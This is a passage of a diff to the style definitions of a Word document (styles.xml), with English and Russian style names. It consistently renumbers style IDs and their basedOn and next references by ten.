     <w:qFormat/>
     <w:rPr>
@@ -39149,9 +40897,9 @@
       <w:szCs w:val="40"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="895">
+  <w:style w:type="character" w:styleId="905">
     <w:name w:val="Heading 2 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39159,9 +40907,9 @@
       <w:sz w:val="34"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="896">
+  <w:style w:type="character" w:styleId="906">
     <w:name w:val="Heading 3 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39170,9 +40918,9 @@
       <w:szCs w:val="30"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="897">
+  <w:style w:type="character" w:styleId="907">
     <w:name w:val="Heading 4 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39183,9 +40931,9 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="898">
+  <w:style w:type="character" w:styleId="908">
     <w:name w:val="Heading 5 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39196,9 +40944,9 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="899">
+  <w:style w:type="character" w:styleId="909">
     <w:name w:val="Heading 6 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39209,9 +40957,9 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="900">
+  <w:style w:type="character" w:styleId="910">
     <w:name w:val="Heading 7 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39224,9 +40972,9 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="901">
+  <w:style w:type="character" w:styleId="911">
     <w:name w:val="Heading 8 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39237,9 +40985,9 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="902">
+  <w:style w:type="character" w:styleId="912">
     <w:name w:val="Heading 9 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39250,9 +40998,9 @@
       <w:szCs w:val="21"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="903">
+  <w:style w:type="character" w:styleId="913">
     <w:name w:val="Title Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="10"/>
     <w:qFormat/>
     <w:rPr>
@@ -39260,9 +41008,9 @@
       <w:szCs w:val="48"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="904">
+  <w:style w:type="character" w:styleId="914">
     <w:name w:val="Subtitle Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="11"/>
     <w:qFormat/>
     <w:rPr>
@@ -39270,7 +41018,7 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="905">
+  <w:style w:type="character" w:styleId="915">
     <w:name w:val="Quote Char"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
@@ -39278,7 +41026,7 @@
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="906">
+  <w:style w:type="character" w:styleId="916">
     <w:name w:val="Intense Quote Char"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
@@ -39286,24 +41034,24 @@
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="907">
+  <w:style w:type="character" w:styleId="917">
     <w:name w:val="Header Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="character" w:styleId="908">
+  <w:style w:type="character" w:styleId="918">
     <w:name w:val="Footer Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="character" w:styleId="909">
+  <w:style w:type="character" w:styleId="919">
     <w:name w:val="Caption Char"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="character" w:styleId="910">
+  <w:style w:type="character" w:styleId="920">
     <w:name w:val="Footnote Text Char"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
@@ -39311,7 +41059,7 @@
       <w:sz w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="911">
+  <w:style w:type="character" w:styleId="921">
     <w:name w:val="Endnote Text Char"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
@@ -39319,7 +41067,7 @@
       <w:sz w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="912">
+  <w:style w:type="character" w:styleId="922">
     <w:name w:val="Символ концевой сноски"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -39329,22 +41077,22 @@
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="913">
+  <w:style w:type="character" w:styleId="923">
     <w:name w:val="endnote reference"/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="914" w:default="1">
+  <w:style w:type="character" w:styleId="924" w:default="1">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="character" w:styleId="915" w:customStyle="1">
+  <w:style w:type="character" w:styleId="925" w:customStyle="1">
     <w:name w:val="Заголовок 1 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39355,9 +41103,9 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="916" w:customStyle="1">
+  <w:style w:type="character" w:styleId="926" w:customStyle="1">
     <w:name w:val="Заголовок 2 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39368,9 +41116,9 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="917" w:customStyle="1">
+  <w:style w:type="character" w:styleId="927" w:customStyle="1">
     <w:name w:val="Заголовок Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="10"/>
     <w:qFormat/>
     <w:rPr>
@@ -39381,27 +41129,27 @@
       <w:szCs w:val="56"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="918" w:customStyle="1">
+  <w:style w:type="character" w:styleId="928" w:customStyle="1">
     <w:name w:val="Верхний колонтитул Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
     <w:rPr>
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="919" w:customStyle="1">
+  <w:style w:type="character" w:styleId="929" w:customStyle="1">
     <w:name w:val="Нижний колонтитул Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:qFormat/>
     <w:rPr>
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="920">
+  <w:style w:type="character" w:styleId="930">
     <w:name w:val="annotation reference"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39411,9 +41159,9 @@
       <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="921" w:customStyle="1">
+  <w:style w:type="character" w:styleId="931" w:customStyle="1">
     <w:name w:val="Текст примечания Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39422,9 +41170,9 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="922" w:customStyle="1">
+  <w:style w:type="character" w:styleId="932" w:customStyle="1">
     <w:name w:val="Тема примечания Знак"/>
-    <w:basedOn w:val="921"/>
+    <w:basedOn w:val="931"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39435,9 +41183,9 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="923" w:customStyle="1">
+  <w:style w:type="character" w:styleId="933" w:customStyle="1">
     <w:name w:val="Текст выноски Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39447,9 +41195,9 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="924" w:customStyle="1">
+  <w:style w:type="character" w:styleId="934" w:customStyle="1">
     <w:name w:val="Заголовок 3 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rPr>
@@ -39460,9 +41208,9 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="925" w:customStyle="1">
+  <w:style w:type="character" w:styleId="935" w:customStyle="1">
     <w:name w:val="Заголовок 4 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39474,9 +41222,9 @@
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="926" w:customStyle="1">
+  <w:style w:type="character" w:styleId="936" w:customStyle="1">
     <w:name w:val="Заголовок 5 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39486,9 +41234,9 @@
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="927" w:customStyle="1">
+  <w:style w:type="character" w:styleId="937" w:customStyle="1">
     <w:name w:val="Заголовок 6 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39498,9 +41246,9 @@
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="928" w:customStyle="1">
+  <w:style w:type="character" w:styleId="938" w:customStyle="1">
     <w:name w:val="Заголовок 7 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39512,9 +41260,9 @@
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="929" w:customStyle="1">
+  <w:style w:type="character" w:styleId="939" w:customStyle="1">
     <w:name w:val="Заголовок 8 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39525,9 +41273,9 @@
       <w:szCs w:val="21"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="930" w:customStyle="1">
+  <w:style w:type="character" w:styleId="940" w:customStyle="1">
     <w:name w:val="Заголовок 9 Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39540,9 +41288,9 @@
       <w:szCs w:val="21"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="931">
+  <w:style w:type="character" w:styleId="941">
     <w:name w:val="Hyperlink"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:rPr>
@@ -39550,18 +41298,18 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="932" w:customStyle="1">
+  <w:style w:type="character" w:styleId="942" w:customStyle="1">
     <w:name w:val="Table 1 Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:qFormat/>
     <w:rPr>
       <w:b/>
       <w:sz w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="933">
+  <w:style w:type="character" w:styleId="943">
     <w:name w:val="Unresolved Mention"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39571,9 +41319,9 @@
       <w:shd w:val="clear" w:color="auto" w:fill="e1dfdd"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="934" w:customStyle="1">
+  <w:style w:type="character" w:styleId="944" w:customStyle="1">
     <w:name w:val="Текст сноски Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39582,22 +41330,22 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="935" w:customStyle="1">
+  <w:style w:type="character" w:styleId="945" w:customStyle="1">
     <w:name w:val="Символ сноски"/>
     <w:qFormat/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="936">
+  <w:style w:type="character" w:styleId="946">
     <w:name w:val="footnote reference"/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="937" w:customStyle="1">
+  <w:style w:type="character" w:styleId="947" w:customStyle="1">
     <w:name w:val="Footnote Characters"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39606,9 +41354,9 @@
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="938" w:customStyle="1">
+  <w:style w:type="character" w:styleId="948" w:customStyle="1">
     <w:name w:val="Parameter Char"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:qFormat/>
     <w:rPr>
       <w:b/>
@@ -39616,9 +41364,9 @@
       <w:lang w:val="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="939" w:customStyle="1">
+  <w:style w:type="character" w:styleId="949" w:customStyle="1">
     <w:name w:val="Стандартный HTML Знак"/>
-    <w:basedOn w:val="914"/>
+    <w:basedOn w:val="924"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:qFormat/>
@@ -39629,14 +41377,14 @@
       <w:lang w:eastAsia="ru-RU"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="940" w:customStyle="1">
+  <w:style w:type="character" w:styleId="950" w:customStyle="1">
     <w:name w:val="Ссылка указателя"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="941">
+  <w:style w:type="paragraph" w:styleId="951">
     <w:name w:val="Заголовок"/>
-    <w:basedOn w:val="884"/>
-    <w:next w:val="942"/>
+    <w:basedOn w:val="894"/>
+    <w:next w:val="952"/>
     <w:qFormat/>
     <w:pPr>
       <w:keepNext/>
@@ -39648,23 +41396,23 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="942">
+  <w:style w:type="paragraph" w:styleId="952">
     <w:name w:val="Body Text"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:pPr>
       <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="943">
+  <w:style w:type="paragraph" w:styleId="953">
     <w:name w:val="List"/>
-    <w:basedOn w:val="942"/>
+    <w:basedOn w:val="952"/>
     <w:rPr>
       <w:rFonts w:cs="Mangal"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="944">
+  <w:style w:type="paragraph" w:styleId="954">
     <w:name w:val="Caption"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="35"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -39677,9 +41425,9 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="945">
+  <w:style w:type="paragraph" w:styleId="955">
     <w:name w:val="Указатель"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:qFormat/>
     <w:pPr>
       <w:suppressLineNumbers/>
@@ -39688,7 +41436,7 @@
       <w:rFonts w:cs="Lohit Devanagari"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="946">
+  <w:style w:type="paragraph" w:styleId="956">
     <w:name w:val="No Spacing"/>
     <w:uiPriority w:val="1"/>
     <w:qFormat/>
@@ -39705,9 +41453,9 @@
       <w:lang w:val="ru-RU" w:eastAsia="en-US" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="947">
+  <w:style w:type="paragraph" w:styleId="957">
     <w:name w:val="Subtitle"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="11"/>
     <w:qFormat/>
     <w:pPr>
@@ -39718,9 +41466,9 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="948">
+  <w:style w:type="paragraph" w:styleId="958">
     <w:name w:val="Quote"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
     <w:pPr>
@@ -39730,9 +41478,9 @@
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="949">
+  <w:style w:type="paragraph" w:styleId="959">
     <w:name w:val="Intense Quote"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
     <w:pPr>
@@ -39750,9 +41498,9 @@
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="950">
+  <w:style w:type="paragraph" w:styleId="960">
     <w:name w:val="endnote text"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39763,9 +41511,9 @@
       <w:sz w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="951">
+  <w:style w:type="paragraph" w:styleId="961">
     <w:name w:val="toc 4"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39773,9 +41521,9 @@
       <w:spacing w:before="0" w:after="57"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="952">
+  <w:style w:type="paragraph" w:styleId="962">
     <w:name w:val="toc 5"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39783,9 +41531,9 @@
       <w:spacing w:before="0" w:after="57"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="953">
+  <w:style w:type="paragraph" w:styleId="963">
     <w:name w:val="toc 6"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39793,9 +41541,9 @@
       <w:spacing w:before="0" w:after="57"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="954">
+  <w:style w:type="paragraph" w:styleId="964">
     <w:name w:val="toc 7"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39803,9 +41551,9 @@
       <w:spacing w:before="0" w:after="57"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="955">
+  <w:style w:type="paragraph" w:styleId="965">
     <w:name w:val="toc 8"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39813,9 +41561,9 @@
       <w:spacing w:before="0" w:after="57"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="956">
+  <w:style w:type="paragraph" w:styleId="966">
     <w:name w:val="toc 9"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39823,9 +41571,9 @@
       <w:spacing w:before="0" w:after="57"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="957">
+  <w:style w:type="paragraph" w:styleId="967">
     <w:name w:val="Title"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="10"/>
     <w:qFormat/>
     <w:pPr>
@@ -39841,9 +41589,9 @@
       <w:szCs w:val="56"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="958">
+  <w:style w:type="paragraph" w:styleId="968">
     <w:name w:val="index heading"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:qFormat/>
     <w:pPr>
       <w:suppressLineNumbers/>
@@ -39852,14 +41600,14 @@
       <w:rFonts w:cs="Mangal"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="959">
+  <w:style w:type="paragraph" w:styleId="969">
     <w:name w:val="Колонтитул"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="960">
+  <w:style w:type="paragraph" w:styleId="970">
     <w:name w:val="Header"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39871,9 +41619,9 @@
       </w:tabs>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="961">
+  <w:style w:type="paragraph" w:styleId="971">
     <w:name w:val="Footer"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39885,9 +41633,9 @@
       </w:tabs>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="962">
+  <w:style w:type="paragraph" w:styleId="972">
     <w:name w:val="annotation text"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39897,9 +41645,9 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="963">
+  <w:style w:type="paragraph" w:styleId="973">
     <w:name w:val="annotation subject"/>
-    <w:basedOn w:val="962"/>
+    <w:basedOn w:val="972"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39909,9 +41657,9 @@
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="964">
+  <w:style w:type="paragraph" w:styleId="974">
     <w:name w:val="Balloon Text"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39925,13 +41673,13 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="965">
+  <w:style w:type="paragraph" w:styleId="975">
     <w:name w:val="Index Heading"/>
-    <w:basedOn w:val="941"/>
+    <w:basedOn w:val="951"/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="966">
+  <w:style w:type="paragraph" w:styleId="976">
     <w:name w:val="TOC Heading"/>
-    <w:basedOn w:val="885"/>
+    <w:basedOn w:val="895"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -39950,9 +41698,9 @@
       <w:lang w:val="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="967">
+  <w:style w:type="paragraph" w:styleId="977">
     <w:name w:val="toc 1"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -39964,9 +41712,9 @@
       </w:tabs>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="968" w:customStyle="1">
+  <w:style w:type="paragraph" w:styleId="978" w:customStyle="1">
     <w:name w:val="Table 1"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:qFormat/>
     <w:pPr>
       <w:jc w:val="left"/>
@@ -39976,9 +41724,9 @@
       <w:b/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="969">
+  <w:style w:type="paragraph" w:styleId="979">
     <w:name w:val="footnote text"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -39990,9 +41738,9 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="970">
+  <w:style w:type="paragraph" w:styleId="980">
     <w:name w:val="table of figures"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -40000,18 +41748,18 @@
       <w:spacing w:before="0" w:after="0"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="971" w:customStyle="1">
+  <w:style w:type="paragraph" w:styleId="981" w:customStyle="1">
     <w:name w:val="Parameter"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:qFormat/>
     <w:rPr>
       <w:b/>
       <w:lang w:val="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="972">
+  <w:style w:type="paragraph" w:styleId="982">
     <w:name w:val="toc 2"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -40019,9 +41767,9 @@
       <w:spacing w:before="0" w:after="100"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="973">
+  <w:style w:type="paragraph" w:styleId="983">
     <w:name w:val="toc 3"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -40029,9 +41777,9 @@
       <w:spacing w:before="0" w:after="100"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="974">
+  <w:style w:type="paragraph" w:styleId="984">
     <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
     <w:pPr>
@@ -40040,9 +41788,9 @@
       <w:spacing w:before="0" w:after="240"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="975">
+  <w:style w:type="paragraph" w:styleId="985">
     <w:name w:val="HTML Preformatted"/>
-    <w:basedOn w:val="884"/>
+    <w:basedOn w:val="894"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -40077,14 +41825,14 @@
       <w:lang w:eastAsia="ru-RU"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="numbering" w:styleId="976" w:default="1">
+  <w:style w:type="numbering" w:styleId="986" w:default="1">
     <w:name w:val="No List"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
   </w:style>
